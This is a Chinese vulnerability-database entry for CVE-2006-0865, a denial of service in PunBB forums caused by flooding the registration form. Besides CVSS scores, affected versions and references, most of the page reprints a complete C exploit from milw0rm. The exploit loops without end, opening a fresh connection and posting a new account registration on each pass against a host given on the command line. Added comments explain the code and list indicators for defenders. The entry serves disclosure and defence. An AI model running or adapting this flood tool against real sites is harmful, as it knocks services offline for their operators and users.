CVE-2006-0865
CVSS5.0
发布时间 :2006-02-23 18:02:00
修订时间 :2008-09-05 17:00:25
NMCOE    

[原文]PunBB 1.2.10 and earlier allows remote attackers to cause a denial of service (resource consumption) by registering many user accounts quickly.


[CNNVD]PunBB 注册大量用户帐号拒绝服务漏洞(CNNVD-200602-349)

        PunBB 1.2.10及之前版本可使远程攻击者通过快速注册大量用户帐号来造成拒绝服务(资源占用率过高)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:punbb:punbb:1.2.7
cpe:/a:punbb:punbb:1.1.3
cpe:/a:punbb:punbb:1.1.2
cpe:/a:punbb:punbb:1.2.9
cpe:/a:punbb:punbb:1.0_rc2
cpe:/a:punbb:punbb:1.0_rc1
cpe:/a:punbb:punbb:1.2.5
cpe:/a:punbb:punbb:1.2.8
cpe:/a:punbb:punbb:1.2.2
cpe:/a:punbb:punbb:1.0_beta1a
cpe:/a:punbb:punbb:1.2.10
cpe:/a:punbb:punbb:1.2.4
cpe:/a:punbb:punbb:1.0
cpe:/a:punbb:punbb:1.1.1
cpe:/a:punbb:punbb:1.1.4
cpe:/a:punbb:punbb:1.0.1
cpe:/a:punbb:punbb:1.1.5
cpe:/a:punbb:punbb:1.2.3
cpe:/a:punbb:punbb:1.0_beta2
cpe:/a:punbb:punbb:1.2.6
cpe:/a:punbb:punbb:1.0_beta1
cpe:/a:punbb:punbb:1.0_alpha
cpe:/a:punbb:punbb:1.2
cpe:/a:punbb:punbb:1.2.1
cpe:/a:punbb:punbb:1.0_beta3
cpe:/a:punbb:punbb:1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0865
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0865
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-349
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/archive/1/425630/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060219 PunBB 1.2.10 Multiple DoS Vulnerabilities
http://www.neosecurityteam.net/advisories/Advisory-15.txt
(UNKNOWN)  MISC  http://www.neosecurityteam.net/advisories/Advisory-15.txt
http://xforce.iss.net/xforce/xfdb/24837
(UNKNOWN)  XF  punbb-register-ip-dos(24837)

- 漏洞信息

PunBB 注册大量用户帐号拒绝服务漏洞
中危 未知
2006-02-23 00:00:00 2006-02-27 00:00:00
远程  
        PunBB 1.2.10及之前版本可使远程攻击者通过快速注册大量用户帐号来造成拒绝服务(资源占用率过高)。

- 公告与补丁

        

- 漏洞信息 (1517)

PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit (EDBID:1517)
php webapps
2006-02-20 Verified
0 K4P0
N/A [点击下载]
/*
  Name: NST-Exploit Punbb 2.0.10 Denial Of Service
  Copyright: NeoSecurity
  Author: K4P0
    
  [./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/
  
  #################################################
  PunBB 2.0.10 Denial of Service exploit by K4P0  
  Use only at your own reputation risk! ;)        

  www.NeoSecurityTeam.net                         
  #################################################

  [1] - Trying if connection is possible...
  [2] - Connected!
  [3] - Flooding localhost...
  
  Use it at your own risk!.
*/

#define WINDOWS
//#define LINUX

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WINDOWS
#include <winsock2.h>
#include <windows.h>
// Link to (lib)ws2_32.a
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#endif

// Always-true constant used as the condition of the request loop in main(),
// so that loop has no exit condition of its own.
#define NST_ALIVE 1

// Forward declarations for the helpers defined after main().
int  Connect(char*);                   // open a TCP connection to the given dotted-quad IP, port 80
void SendPack(int, int, char*, char*); // build and send one registration POST (socket, counter, path, host name)
void _perror(char*);                   // perror() the message, then exit(-1)
void HowTo(char*);                     // print usage to stderr, then exit(0)

/*
 * Entry point of the published proof-of-concept for the registration-flood
 * denial of service described in this entry (CVE-2006-0865).
 *
 * Arguments, per HowTo(): argv[1] = host name (used for the Host/Referer
 * headers), argv[2] = dotted-quad IP passed to Connect(), argv[3] = forum
 * path prefix. With fewer than three arguments HowTo() prints usage and exits.
 *
 * Behaviour visible in this listing:
 *   - one probe connection is opened and closed immediately;
 *   - an endless loop then opens a new TCP connection per iteration, sends
 *     one account-registration POST through SendPack() with an incrementing
 *     counter, and closes the socket. Nothing is ever read back.
 *
 * NOTE(review): the banner names "PunBB 2.0.10", while the CVE text on this
 * page says "PunBB 1.2.10 and earlier"; treat the banner version as the
 * author's label, not as the affected range.
 *
 * Defender view: this shows up as a high rate of POSTs to
 * register.php?action=register from one source, each on a fresh connection.
 * The page lists no vendor patch, so per-source throttling of registrations
 * and a human-verification or e-mail-confirmation step are the practical
 * controls to check for.
 */
int main(int argc, char* argv[])
{
  int vict_sock, dos = 0;
  puts("#################################################");
  puts(" PunBB 2.0.10 Denial of Service exploit by K4P0  ");
  puts(" Use only at your own reputation risk! ;)        \n");
  puts(" www.NeoSecurityTeam.net                         ");
  // HowTo() does not return (it calls exit), so execution continues only with >= 3 arguments.
  if(argc < 4) HowTo(argv[0]);
  puts("#################################################\n");

  // The format string has no conversion specifier, so the extra argv[1] argument is not printed.
  printf("[1] - Trying if connection is possible...\n", argv[1]);
  fflush(stdout);
  // Probe connection: Connect() exits the process on failure, so reaching the next line means success.
  vict_sock = Connect(argv[2]);
  printf("[2] - Connected!\n");
  printf("[3] - Flooding %s", argv[1]);
  #ifdef WINDOWS
  closesocket(vict_sock);
  #else
  close(vict_sock);
  #endif
  
  // NST_ALIVE is the constant 1: the loop runs until the process is killed or a helper calls exit().
  while(NST_ALIVE)
  {
                         // Progress indicator: one dot on stderr every 10th request.
                         if(!(dos % 10)) fprintf(stderr, ".");
                         vict_sock = Connect(argv[2]);
                         // 'dos' becomes part of the username and e-mail, so every request asks for a new, distinct account.
                         SendPack(vict_sock, dos, argv[3], argv[1]);
                         dos++;
                         #ifdef WINDOWS
                         closesocket(vict_sock);
                         // Pairs with the WSAStartup() that Connect() performs on every call.
                         WSACleanup();
                         #else
                         close(vict_sock);
                         #endif
  }
  return 0;
}
// I'm to lazy to use gethostby(addr|name) :)
/*
 * Open a TCP connection to IP on port 80 and return the socket.
 *
 * IP must be a dotted-quad string: it is handed to inet_addr() and no name
 * resolution is attempted. The port is fixed at 80 (plain HTTP).
 * Every failure path terminates the process (exit(-1) directly or through
 * _perror()), so the function returns only after connect() has succeeded.
 *
 * NOTE(review): the socket()/_perror() fallback is written as the else-arm
 * of the WSASocket() check and sits inside the #ifdef WINDOWS region, so it
 * is compiled only in a WINDOWS build; a non-WINDOWS build of this listing
 * contains no statement that assigns vict_sck before connect() uses it.
 */
int Connect(char* IP)
{
    struct sockaddr_in *_addr;
    int vict_sck;
    
    #ifdef WINDOWS
    // Winsock is initialised on every call (version 1.1 requested); main() calls WSACleanup() per loop iteration.
    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
    {
                              //WSAGetLastError()? Nah...
                              fprintf(stderr, "[*]   WSAStartup() failed");
                              exit(-1);
    }
    #endif
    
    // The address structure is heap-allocated and freed again before returning.
    if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in))))
    {
                     fprintf(stderr, "[*]   Unable to reserve memory");
                     exit(-1);
    }
      
    memset(_addr, 0x0, sizeof(struct sockaddr_in));
    _addr->sin_family = AF_INET;
    _addr->sin_port   = htons(80);
    // The result of inet_addr() is not checked, so a malformed IP string is not rejected here.
    _addr->sin_addr.s_addr = inet_addr(IP);
    
    #ifdef WINDOWS
    if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0)
    {
                 fprintf(stderr, "WSASocket() failed");
                 exit(-1);
    }
    else
    // Else-arm of the check above: runs when WSASocket() did not report failure and reassigns vict_sck.
    if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) 
                 _perror("socket() ");
    #endif
    
    // The address length passed is sizeof(struct sockaddr), not sizeof(struct sockaddr_in).
    if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0)
                 _perror("connect() "); 
    
    free(_addr);
    return vict_sck; 
}

/*
 * Build one HTTP POST to <path>register.php?action=register and send it on
 * the already-connected socket v_sck.
 *
 *   v_sck - connected socket returned by Connect()
 *   var   - request counter; embedded in the username and e-mail fields
 *   path  - forum path prefix taken from the command line
 *   DNS   - host name used for the Host and Referer headers
 *
 * The request is written with a single send(); its return value is not
 * checked and no response is read, so the tool itself never learns whether
 * a registration was accepted.
 *
 * Indicators a defender can match on, all taken from the literals below:
 *   - username "<n>__NsT" and e-mail "<n>_peace@NsT.net" with n counting up;
 *   - both password fields set to "flood", timezone=-10, email_setting=1;
 *   - fixed User-Agent "Mozilla/5.0 Gecko/20050511 Firefox/1.0.4";
 *   - a Proxy-Connection header, and header lines ended with "\n" only.
 *
 * NOTE(review): path and DNS are copied with unbounded sprintf()/strcat()
 * into fixed heap buffers (2048/1024/512 bytes), so overlong arguments
 * overflow the tool's own buffers; strlen() is also printed with %d.
 */
void SendPack(int v_sck, int var, char* path, char* DNS)
{
     char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST;
     // Three scratch buffers: full request, Content-Length line, form body.
     if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) ||
        !(HTTP_POST = (char *)malloc(512)))
     {
                    fprintf(stderr, "Error trying to reserver memory");
                    exit(-1);
     }
     // Request line and static headers; path and DNS are each inserted twice.
     sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n"
                        "Host: %s\n"
                        "User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n"
                        "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"
                        "Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n"
                        "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"
                        "Keep-Alive: 300\n"
                        "Proxy-Connection: keep-alive\n"
                        "Referer: http://%s%sregister.php\n"
                        "Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path);
                                                                            
     // Form body: the counter makes the username and e-mail differ on every request.
     sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&"
                        "req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var);
     
     // Content-Length is derived from the body just built; the blank line ends the header section.
     sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST));
        
     strcat(HTTP_PACK, HTTP_MPCK);
     strcat(HTTP_PACK, HTTP_POST);
     send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0);
     
     free(HTTP_PACK);
     free(HTTP_MPCK);
     free(HTTP_POST);
     return;
}

/*
 * Fatal-error helper: report msg together with the current errno text via
 * perror(), flush stdout, and end the process with exit(-1). Never returns.
 * Connect() calls it when socket() or connect() fails.
 */
void _perror(char* msg)
{
     perror(msg);
     (void)fflush(stdout);   /* push out any buffered progress text before exiting */
     exit(-1);
}

/*
 * Print the usage line, the author's example invocation and the closing
 * banner rule to stderr, then terminate with exit(0). Never returns.
 *
 *   program - name to show in the usage line (main() passes argv[0])
 *
 * The three positional arguments are, in order: host name, dotted-quad IP
 * address, and forum path prefix.
 */
void HowTo(char* program)
{
     /* Only the first line needs formatting; the other two are constant text. */
     fprintf(stderr, "%s <DNS> <IP> <Path>\n", program);
     fputs("f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n", stderr);
     fputs("#################################################", stderr);
     exit(0);
}

// milw0rm.com [2006-02-20]
		

- 漏洞信息

28162
PunBB User Account Registration Saturation DoS
Denial of Service
Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2006-02-19 Unknown
2006-02-19 Unknown

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 
